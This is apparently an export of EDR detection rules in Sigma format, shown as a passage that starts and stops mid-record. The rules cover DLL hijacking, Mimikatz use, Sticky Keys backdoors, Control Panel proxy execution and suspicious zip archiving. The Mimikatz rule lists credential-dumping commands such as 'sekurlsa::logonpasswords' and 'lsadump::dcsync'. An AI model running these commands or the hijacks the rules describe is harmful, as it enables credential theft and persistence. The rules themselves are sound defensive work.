ProcessOriginalFileName: 'REGSVR32.EXE'\n\n exclusion_scripting:\n ProcessOriginalFileName:\n - 'wscript.EXE'\n - 'cscript.EXE'\n\n exclusion_antiviruses:\n ImageLoaded:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\Mp*.dll'\n - '?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Sysfer\\x64\\sysfer.dll'\n\n exclusion_other:\n ImageLoaded:\n - '?:\\Windows\\servicing\\CbsApi.dll'\n - '?:\\Windows\\servicing\\wrpintapi.dll'\n - '?:\\Windows\\CbsTemp\\\\*\\FodWU\\Metadata\\\\*.dll'\n - '?:\\Windows\\CbsTemp\\\\*\\Client.OS.rs2.amd64\\Metadata\\\\*.dll'\n - '?:\\Windows\\UUS\\amd64\\\\*.dll'\n\n exclusion_dotnet:\n ImageLoaded|startswith: '?:\\Windows\\assembly\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba7f10ac-1480-4b45-817d-16cce2cfb0a4",
"rule_name": "WinSxS Binary Loaded Suspicious DLL",
"rule_description": "Detects potential Windows DLL Hijacking using a WinSxS binary.\nDLL hijacking usually takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers discovered a vulnerability in the Windows search order when using binaries located in the WinSxS system folder.\nIf a WinSxS binary is called from a current working directory containing a missing DLL, the binary will load the DLL planted by the attacker.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-01-03",
"rule_modified_date": "2025-09-01",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ba8ea44e-2cd1-4fda-9c3a-a597d5e7abf6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618548Z",
"creation_date": "2026-03-23T11:45:34.618550Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618555Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "t1560_001_zip_archive_creation_file.yml",
"content": "title: Archive Created via zip in a Suspicious Folder\nid: ba8ea44e-2cd1-4fda-9c3a-a597d5e7abf6\ndescription: |\n Detects the creation of an archive file using the zip utility in a folder commonly used by malicious actors.\n Adversaries may compress and/or encrypt collected data prior to exfiltration.\n It is recommended to check the processes leading to zip's execution and the content of the archive.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2024/07/22\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\n - classification.macOS.Behavior.Exfiltration\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n ProcessImage|endswith: '/zip'\n Path|startswith:\n - '/Users/shared/'\n - '/private/var/tmp/'\n - '/private/tmp/'\n Kind: 'create'\n\n exclusion_webex:\n ProcessParentImage: '/Users/*/Library/Application Support/WebEx Folder/*/Meeting Center.app/Contents/Helpers/webexmta.app/Contents/MacOS/webexmta'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ba8ea44e-2cd1-4fda-9c3a-a597d5e7abf6",
"rule_name": "Archive Created via zip in a Suspicious Folder",
"rule_description": "Detects the creation of an archive file using the zip utility in a folder commonly used by malicious actors.\nAdversaries may compress and/or encrypt collected data prior to exfiltration.\nIt is recommended to check the processes leading to zip's execution and the content of the archive.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-03-06",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bab10aff-0573-459d-8f5c-5fca1a132406",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084204Z",
"creation_date": "2026-03-23T11:45:34.084206Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084210Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz",
"https://attack.mitre.org/software/S0002/"
],
"name": "t1003_launch_mimikatz.yml",
"content": "title: Mimikatz Execution\nid: bab10aff-0573-459d-8f5c-5fca1a132406\ndescription: |\n Detects common binary names and arguments associated with Mimikatz.\n Mimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\n It is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\nreferences:\n - https://github.com/gentilkiwi/mimikatz\n - https://attack.mitre.org/software/S0002/\ndate: 2021/03/03\nmodified: 2025/04/09\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - attack.t1550.002\n - attack.t1550.003\n - attack.defense_evasion\n - attack.t1207\n - attack.s0002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - InternalName:\n - 'mimikatz'\n - 'mimilove'\n - OriginalFileName:\n - 'mimikatz.exe'\n - 'mimilove.exe'\n selection_args:\n - CommandLine|contains:\n - 'privilege::debug'\n - 'kerberos::list'\n - 'kerberos::ptt'\n - 'kerberos::golden'\n - 'kerberos::tgt'\n - 'kerberos::purge'\n - 'sekurlsa::logonpasswords'\n - 'sekurlsa::tickets'\n - 'sekurlsa::pth'\n - 'sekurlsa::ekeys'\n - 'sekurlsa::dpapi'\n - 'sekurlsa::dpcred'\n - 'sekurlsa::minidump'\n - 'sekurlsa::wdigest'\n - 'sekurlsa::kerberos'\n - 'sekurlsa::krbtgt'\n - 'token::elevate'\n - 'lsadump::sam'\n - 'lsadump::trust'\n - 'lsadump::secrets'\n - 'lsadump::cache'\n - 'lsadump::lsa'\n - 'lsadump::dcsync'\n - 'lsadump::dcshadow'\n - 'misc::addsid'\n - 'misc::memssp'\n - 'misc::skeleton'\n\n condition: selection_binary or selection_args\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bab10aff-0573-459d-8f5c-5fca1a132406",
"rule_name": "Mimikatz Execution",
"rule_description": "Detects common binary names and arguments associated with Mimikatz.\nMimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\nIt is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\n",
"rule_creation_date": "2021-03-03",
"rule_modified_date": "2025-04-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078",
"attack.t1207",
"attack.t1550.002",
"attack.t1550.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bab5e737-6c2c-4c7b-91d5-2de4b89836fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069979Z",
"creation_date": "2026-03-23T11:45:34.069981Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069986Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md",
"https://attack.mitre.org/techniques/T1218/002/"
],
"name": "t1218_002_suspicious_control_panel_execution.yml",
"content": "title: Suspicious Process Executed via Control Panel\nid: bab5e737-6c2c-4c7b-91d5-2de4b89836fb\ndescription: |\n Detects the suspicious execution of a process by the control.exe Windows Control Panel binary, which may indicate an attempt to proxy malicious DLL execution through the Windows Control Panel.\n Control.exe is a legitimate Windows system binary that handles the execution of Control Panel items and applets. Rundll32.exe is a Windows utility that loads and executes functions from Dynamic Link Libraries (DLLs). Attackers can use control.exe to spawn rundll32.exe, effectively proxying the execution of malicious DLLs while appearing to originate from a trusted system component.\n It is recommended to investigate the command-line arguments of the rundll32.exe process to identify the specific DLL being loaded, analyze it, and review any network connections or file system modifications made at the time of execution.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md\n - https://attack.mitre.org/techniques/T1218/002/\ndate: 2021/07/16\nmodified: 2025/05/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.LOLBin.Control\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\rundll32.exe'\n GrandparentImage|endswith: '\\control.exe'\n\n exclusion_parent:\n ParentCommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL'\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Windows\\System32\\\\*'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\shell32.dll,Control_RunDLL ?:\\Windows\\System32\\\\*'\n - '?:\\WINDOWS\\system32\\rundll32.exe 
Shell32.dll,Control_RunDLL ?:\\Program Files (x86)\\SageThumbs\\64\\SageThumbs.dll'\n - '?:\\windows\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Program Files\\Microsoft Office\\Office??\\MLCFG32.CPL,'\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\Program Files\\Microsoft Office\\root\\Office??\\MLCFG32.CPL,'\n\n exclusion_commandline:\n CommandLine:\n - '?:\\Windows\\System32\\ComputerDefaults.exe'\n - '?:\\Windows\\System32\\SystemPropertiesComputerName.exe'\n - '?:\\windows\\SysWOW64\\SystemPropertiesComputerName.exe'\n - '?:\\Windows\\System32\\SystemPropertiesRemote.exe'\n - '?:\\windows\\system32\\rundll32.exe ?:\\windows\\system32\\\\*'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files\\\\*'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files (x86)\\\\*'\n - '?:\\windows\\SysWOW64\\rundll32.exe ?:\\windows\\SysWOW64\\shell32.dll,#44 ?:\\Program Files (x86)\\\\*'\n - '?:\\WINDOWS\\SysWOW64\\rundll32.exe ?:\\windows\\SysWOW64\\shell32.dll,#44 \\\\\\\\*\\c$\\Program Files (x86)\\\\*'\n - '?:\\WINDOWS\\SysWOW64\\rundll32.exe ?:\\windows\\SysWOW64\\shell32.dll,#44 ?:\\Windows\\SysWOW64\\\\*'\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL modem.cpl,,Add'\n - '?:\\WINDOWS\\system32\\rundll32.exe Shell32.dll,Control_RunDLL ?:\\WINDOWS\\CCM\\SMSCFGRC.cpl'\n - '?:\\WINDOWS\\system32\\mmc.exe ?:\\windows\\system32\\devmgmt.msc'\n - '?:\\Windows\\System32\\rundll32.exe devmgr.dll,DeviceProperties_RunDLL *'\n - '?:\\Windows\\system32\\control.exe /name Microsoft.Language'\n - '?:\\Windows\\System32\\control.exe ?:\\windows\\system32\\\\*'\n - '?:\\windows\\explorer.exe ms-settings:display'\n - '?:\\Windows\\System32\\SndVol.exe -s'\n - '?:\\WINDOWS\\system32\\\\*.scr /p *'\n - '?:\\Windows\\system32\\ieunatt.exe specialize'\n - '?:\\WINDOWS\\system32\\WerFault.exe -u -p * -s *'\n\n exclusion_image:\n Image:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - 
'?:\\Windows\\System32\\mcbuilder.exe'\n - '?:\\Windows\\System32\\notepad.exe'\n\n exclusion_schneider:\n Image: '?:\\Windows\\system32\\CN*.exe' # (CNFUTW3.EXE, CNFXIP.exe)\n ProcessSigned: 'true'\n ProcessSignature: 'Schneider Electric'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bab5e737-6c2c-4c7b-91d5-2de4b89836fb",
"rule_name": "Suspicious Process Executed via Control Panel",
"rule_description": "Detects the suspicious execution of a process by the control.exe Windows Control Panel binary, which may indicate an attempt to proxy malicious DLL execution through the Windows Control Panel.\nControl.exe is a legitimate Windows system binary that handles the execution of Control Panel items and applets. Rundll32.exe is a Windows utility that loads and executes functions from Dynamic Link Libraries (DLLs). Attackers can use control.exe to spawn rundll32.exe, effectively proxying the execution of malicious DLLs while appearing to originate from a trusted system component.\nIt is recommended to investigate the command-line arguments of the rundll32.exe process to identify the specific DLL being loaded, analyze it, and review any network connections or file system modifications made at the time of execution.\n",
"rule_creation_date": "2021-07-16",
"rule_modified_date": "2025-05-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "baca5663-583c-45f9-b5dc-ea96a22ce542",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088812Z",
"creation_date": "2026-03-23T11:45:34.088814Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088818Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hackingarticles.in/windows-persistence-accessibility-features/",
"https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/privilege-escalation/untitled-3/accessibility-features",
"https://attack.mitre.org/techniques/T1546/008/"
],
"name": "t1546_008_persistence_sticky_keys.yml",
"content": "title: Sticky Keys Backdoor Used\nid: baca5663-583c-45f9-b5dc-ea96a22ce542\ndescription: |\n Detects the launch of accessibility utilities maliciously \"debugged\" through the Image File Execution Option debugger key or simply replaced.\n Attackers can use this technique to achieve persistence and can be triggered through a RDP connection (by pressing the Shift key 5 times for instance).\n It is recommended to investigate subsequent actions performed by the executed binary to look for malicious actions.\nreferences:\n - https://www.hackingarticles.in/windows-persistence-accessibility-features/\n - https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/privilege-escalation/untitled-3/accessibility-features\n - https://attack.mitre.org/techniques/T1546/008/\ndate: 2020/10/02\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.008\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ParentImage|endswith: '\\winlogon.exe'\n # osk.exe or magnify.exe can be spawn directly by utilman.exe\n # after the combination of keys \"Windows key + U\" to launch utilman.exe we can select magnifier or on-Screen Keyboard\n - GrandparentImage|endswith: '\\winlogon.exe'\n\n selection_debugged:\n CommandLine:\n - '* sethc.exe*'\n - '* utilman.exe*'\n - '* osk.exe*'\n - '* Magnify.exe*'\n - '* Narrator.exe*'\n - '* DisplaySwitch.exe*'\n - '* AtBroker.exe*'\n\n selection_targeted_binaries:\n Image|endswith:\n - '\\sethc.exe'\n - '\\utilman.exe'\n - '\\osk.exe'\n - '\\Magnify.exe'\n - '\\Narrator.exe'\n - '\\DisplaySwitch.exe'\n - '\\AtBroker.exe'\n\n filter_original_filenames:\n OriginalFileName:\n - 'sethc.exe'\n - 'utilman2.exe' # weird, contains a 2 in win2016, win7, win10, ..\n - 'osk.exe'\n - 
'ScreenMagnifier.exe' # magnify\n - 'SR.exe' # narrator\n - 'DisplaySwitch.exe'\n - 'AtBroker.exe'\n\n # On recent version the Original filename for Narrator.exe is SR.exe\n # On old version of Windows 7 we find Narrator.exe with Original filename which is Narrator.exe\n # https://www.virustotal.com/gui/file/03c9cfbf3f279ba38d35ab93563846ce44e5482e8e1882d19bd34635fd5ef3b1\n # SHA256: 03c9cfbf3f279ba38d35ab93563846ce44e5482e8e1882d19bd34635fd5ef3b1\n # Product version: 6.1.7601.23403\n filter_original_narrator:\n OriginalFileName: 'Narrator.exe'\n InternalName: 'Narrator.exe'\n Description: 'Narrator'\n Company: 'Microsoft Corporation'\n Product: 'Microsoft® Windows® Operating System'\n LegalCopyright: '© Microsoft Corporation. All rights reserved.'\n\n # Process is being debugged OR replaced binaries are executed\n condition: selection and ((selection_debugged and not selection_targeted_binaries) or (selection_targeted_binaries and not 1 of filter_*))\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "baca5663-583c-45f9-b5dc-ea96a22ce542",
"rule_name": "Sticky Keys Backdoor Used",
"rule_description": "Detects the launch of accessibility utilities maliciously \"debugged\" through the Image File Execution Option debugger key or simply replaced.\nAttackers can use this technique to achieve persistence, and it can be triggered through an RDP connection (by pressing the Shift key 5 times, for instance).\nIt is recommended to investigate subsequent actions performed by the executed binary to look for malicious actions.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bace5f6c-d484-4530-8223-00bf3e60dc04",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593469Z",
"creation_date": "2026-03-23T11:45:34.593472Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593480Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nethost.yml",
"content": "title: DLL Hijacking via nethost.exe\nid: bace5f6c-d484-4530-8223-00bf3e60dc04\ndescription: |\n Detects potential Windows DLL Hijacking via nethost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'nethost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\rtutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bace5f6c-d484-4530-8223-00bf3e60dc04",
"rule_name": "DLL Hijacking via nethost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via nethost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bae2358c-3fa3-468c-a5d5-ac72c61adbc3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096717Z",
"creation_date": "2026-03-23T11:45:34.096719Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096723Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_shellappruntim.yml",
"content": "title: DLL Hijacking via ShellAppRunt.exe\nid: bae2358c-3fa3-468c-a5d5-ac72c61adbc3\ndescription: |\n Detects potential Windows DLL Hijacking via ShellAppRunt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ShellAppRuntime.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcrypt.dll'\n - '\\idstore.dll'\n - '\\shell32.dll'\n - '\\wlidprov.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bae2358c-3fa3-468c-a5d5-ac72c61adbc3",
"rule_name": "DLL Hijacking via ShellAppRunt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ShellAppRunt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bb1c58fe-1301-4caf-8ca8-6fef9d1f7b5d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072783Z",
"creation_date": "2026-03-23T11:45:34.072785Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072789Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/",
"https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
